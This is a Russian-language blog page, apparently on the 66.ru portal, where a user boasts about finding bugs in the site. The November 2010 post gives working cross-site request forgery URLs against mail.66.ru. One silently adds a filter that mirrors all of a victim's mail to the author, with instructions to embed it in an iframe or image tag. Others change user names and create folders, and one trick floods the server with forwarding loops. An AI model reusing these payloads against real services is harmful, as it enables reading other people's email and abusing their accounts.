Вход на сайт Вход на сайт
Вход Регистрация Забыли пароль?  

Ваш логин
Пароль
 
Закрыть
курсы валют сегодня
$ 30.3626 + 0.0026
€ 39.7841 0.0543

-12 слабый снег

Слабый снег

  • ночью: -19° C
  • завтра: -15° C
  • послезавтра: -25° C
 

В России 3 беды: дураки, дороги и домены .РФ

Аватар Render
карма
27,1
 
  метки записей:
 
2012
Январь
пн вт ср чт пт сб вс
      1
2345678
9101112131415
16171819202122
23242526272829
3031     
 
  ответы: RSS-лента последних ответов
66 сам нам его говорит,
даже если изображение
запаролено\запривачено.
Осталось только
выяснить, как
определить photo_id
запароленного
изображения. :)
дак видимо и нашел,тока
тихо
молчит(наслаждаетцо)[:-
D]
Вы думаете, что я не
нашел? Надо было.
надо было ню
найти!!!)))
А редиска красивая на
картинке)))
Этот путь слишком
прост.
нагло)) можно было
попросить и я бы
открыла доступ)
Псот - тупой пеар
редакции ШесятШесть
наглядный пример того
что даже разбираясь в
веб-технологиях можно
быть круглым дураком
Суббота, 30 июля 2011  RSS-лента записей блога
 
16:59
http://img.66.ru/image/e91b2b4ea92870f6050bb6b8c7eb0223/47dd6289/0/94/65/946584_normal.jpg
Прямые ссылки на изображения 66 представляют собой нечто вроде:
http://img.66.ru/image/e91b2b4ea92870f6050bb6b8c7eb0223/47dd6289/0/94/65/946584_normal.jpg
Куча каких-то хэшэй. Я, как недалёкий, ничего не понял и пошел в обход.
читать далее...
216 просмотров  
+3
Пятница, 31 декабря 2010
 
18:55
Редакция 66.ru от всей души поздравляет с этим знаменательным событием своих обожаемых читателей.

http://www.66.ru/news/society/75721/

Вычислил номер, вычислил заголовок и подзоголовок, даже картинку:

ссылка

А саму новость невидно, придется ждать.

UPD: Дааа.... Нужный баг найден, полный текст новости получен:
читать далее...
306 просмотров  
-7
Четверг, 11 ноября 2010
 
12:00
Первое, следующая ссылка добавляет фильтр на почту, который пересылает все сообщения злоумышленнику:

http://mail.66.ru/?controller=options&action=saveNewFilter&page=showUserFilters&ruleSelect1=Message+Size&opSelect1=less+than&ruleText1=-1&actionSelect1=Mirror+to&actionText1=Render%4066.ru

Размещаем её в iframe или как src у картинки на сайте злоумышленника и читаем чужую почту.

Второе, следующая ссылка изменяет имя пользователя на "ololo" и подпись на "hello":

http://mail.66.ru/?controller=options&action=saveOptions&page=showUserData&user_name=ololo&user_signature=hello

Третье, следующая ссылка создаёт папку с именем "ololo":

http://mail.66.ru/?controller=options&action=createNewFolder&new_folder=ololo

Компот, если создать фильтр ( а лучше несколько... ) пересылающих все письма самому себе, то сервер уходит в некоторое подобие рекурсии... Защита какае-то от этого есть, ибо:
При одном фильтре пересылка идёт 16 раз.
При двух фильтрах пересылка идёт 800+ раз. Я думал вобще не остановится...

Больше фильтров - больше писем...

Я, честно говоря, не знаю, есть ли придел.
283 просмотра  
0
 
11:50



Вопрос: Вы - идиот?
1.  
Да.
20 голосов

357 просмотров  
+5
Воскресенье, 7 ноября 2010
 
22:06
106 просмотров  
0
Пятница, 20 августа 2010
 
08:35
66бар излучает оптимизм своими показаниями погоды.


http://66.ru/_ffp.php?giveme=weather
266 просмотров  
0
Среда, 14 июля 2010
 
12:02
Все человекостроители читаем далее.
читать далее...
378 просмотров  
-2
 
12:01
Ну что я вам рассказываю?
читать далее...
185 просмотров  
-2
 
12:00
Читаем далее.
читать далее...
155 просмотров  
-5
Четверг, 8 июля 2010
 
09:44
Тов. Nafigator добавил меня в список игнорируемых.
Но нам веть пофиг, да?
читать далее...
249 просмотров  
+2
 
За последние сутки на сайте:
Новостей:
Фотографий:
Записей в блогах:
Записей в клубах:
Авто объявлений:
Новых регистраций: